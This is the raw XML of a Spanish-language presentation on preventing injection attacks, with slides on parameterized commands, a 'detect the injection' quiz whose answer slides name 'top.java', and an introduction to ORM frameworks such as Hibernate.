                          <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                          <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                        </a:rPr>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019355"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="824736">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="es-UY" sz="3600" b="1" noProof="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Parámetro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UY" sz="3600" b="1" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0070C0"/>
                          </a:solidFill>
                          <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                          <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                        </a:rPr>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2663150"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Curved Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{253FE8D2-F568-C24B-B653-D229D68A7DFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6791945" y="4003842"/>
            <a:ext cx="1513855" cy="12700"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="53975">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:alpha val="99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3" name="Table 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF557DF5-6613-AA45-931A-0A33923B6AAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4003780944"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8538764" y="2712156"/>
          <a:ext cx="2814510" cy="2227198"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:effectLst/>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2814510">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1410839684"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="2227198">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="es-UY" sz="4000" b="1" noProof="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Intérprete de comandos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3156418"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{646A44C0-63B9-A646-9F95-AFE66A41BB67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="672727" y="5291618"/>
            <a:ext cx="10846546" cy="11079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UY" sz="6600" b="1" i="0" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="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rPr>
              <a:t>… previenen inyecciones!</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="es-UY" sz="6600" b="0" i="0" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="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0820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B74973-79DF-714C-909D-0723420CF39C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="613459" y="3646026"/>
            <a:ext cx="8506790"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UY" sz="7200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Juguemos a:</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s-UY" sz="7800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>¡DETECTAR LA INYECCIÓN!</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UY" sz="4400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="298927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29B74-8A48-1163-CD25-945C497FDCD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3D0183F-0B8E-3449-ACE9-6F3FC4F08C34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="206151"/>
            <a:ext cx="12192000" cy="6142534"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEF42250-B4EA-8FCA-67D1-36784EA57C79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1914676"/>
            <a:ext cx="12192000" cy="325925"/>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A0DCF23-3767-FE26-8C29-857D7EB357BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4549699"/>
            <a:ext cx="12192000" cy="325925"/>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09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5299C5F-45D1-E625-E002-AECFD3081812}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1760964"/>
            <a:ext cx="10515600" cy="3336071"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-UY" sz="8800" dirty="0"/>
              <a:t>Respuesta: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-UY" sz="8800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-UY" sz="8800" dirty="0"/>
              <a:t>top.java</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="97141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949D7D-9A5E-0F4A-99A0-0B3369B67C51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="452836"/>
            <a:ext cx="12192000" cy="5814541"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA9C2BAB-CF85-B742-AAAB-9EAE98BF93E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3299304" y="4348011"/>
            <a:ext cx="495300" cy="241300"/>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1617345"/>
            <a:ext cx="12192000" cy="325925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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4006346"/>
            <a:ext cx="12192000" cy="325925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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F0A0EC48-B0EE-1F47-9E4C-7BFF853357F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2710059" y="5285773"/>
            <a:ext cx="495300" cy="241300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8C1B088-ED4A-6E4E-BC20-3A9BABE8CA3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2576448" y="5336399"/>
            <a:ext cx="152400" cy="165100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97D74A43-F102-D94C-ABC8-C7329B835456}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3782078" y="4398637"/>
            <a:ext cx="152400" cy="165100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="221580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5299C5F-45D1-E625-E002-AECFD3081812}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1760964"/>
            <a:ext cx="10515600" cy="3336071"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-UY" sz="8800" dirty="0"/>
              <a:t>Respuesta: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-UY" sz="8800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-UY" sz="8800" dirty="0"/>
              <a:t>top.java</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37652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216038"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="5400" dirty="0" err="1"/>
              <a:t>Frameworks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="5400" dirty="0"/>
              <a:t> ORM</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type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1150248"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ORM = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Relational</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Mapping</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="3600" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Los </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>frameworks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> ORM alejan a los desarrolladores de las consultas SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Framework ORM muy popular: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Hibernate</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="3600" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="768" name="Google Shape;768;p56"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3264726361"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4552140" y="3873593"/>
          <a:ext cx="3831175" cy="2144125"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:noFill/>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2089450">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1741725">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="567075">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="FFFFFF"/>
                        </a:buClr>
                        <a:buSzPts val="2800"/>
                        <a:buFont typeface="Radley"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" u="none" strike="noStrike" cap="none"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sym typeface="Radley"/>
                        </a:rPr>
                        <a:t>Command</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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txBody>
                  <a:tcPr marL="45725" marR="45725" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="FFFFFF"/>
                        </a:buClr>
                        <a:buSzPts val="2800"/>
                        <a:buFont typeface="Radley"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" u="sng" strike="noStrike" cap="none"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sym typeface="Radley"/>
                        </a:rPr>
                        <a:t>Constant</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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txBody>
                  <a:tcPr marL="45725" marR="45725" marT="45725" marB="45725"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="788525">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="FFFFFF"/>
                        </a:buClr>
                        <a:buSzPts val="2800"/>
                        <a:buFont typeface="Radley"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" u="none" strike="noStrike" cap="none">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                          <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                          <a:sym typeface="Radley"/>
                        </a:rPr>
                        <a:t>Parameter 1</a:t>
                      </a:r>
                      <a:endParaRPr sz="120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txBody>
                  <a:tcPr marL="45725" marR="45725" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="FFFFFF"/>
                        </a:buClr>
                        <a:buSzPts val="2800"/>
                        <a:buFont typeface="Radley"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" u="none" strike="noStrike" cap="none"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sym typeface="Radley"/>
                        </a:rPr>
                        <a:t>Input</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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txBody>
                  <a:tcPr marL="45725" marR="45725" marT="45725" marB="45725"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="788525">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="FFFFFF"/>
                        </a:buClr>
                        <a:buSzPts val="2800"/>
                        <a:buFont typeface="Radley"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" u="none" strike="noStrike" cap="none">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                          <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                          <a:sym typeface="Radley"/>
                        </a:rPr>
                        <a:t>Parameter 2</a:t>
                      </a:r>
                      <a:endParaRPr sz="120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txBody>
                  <a:tcPr marL="45725" marR="45725" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="FFFFFF"/>
                        </a:buClr>
                        <a:buSzPts val="2800"/>
                        <a:buFont typeface="Radley"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" u="none" strike="noStrike" cap="none"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sym typeface="Radley"/>
                        </a:rPr>
                        <a:t>Input</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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txBody>
                  <a:tcPr marL="45725" marR="45725" marT="45725" marB="45725"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="769" name="Google Shape;769;p56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8518716" y="4483510"/>
            <a:ext cx="526383" cy="391649"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="21600" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="5400" y="0"/>
                  <a:pt x="10800" y="5400"/>
                  <a:pt x="10800" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="16200"/>
                  <a:pt x="16200" y="21600"/>
                  <a:pt x="21600" y="21600"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="53975" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:alpha val="99000"/>
              </a:schemeClr>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chemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="770" name="Google Shape;770;p56"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3095071488"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="9135153" y="3873593"/>
          <a:ext cx="2523446" cy="2227200"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:noFill/>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2523446">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="2227200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
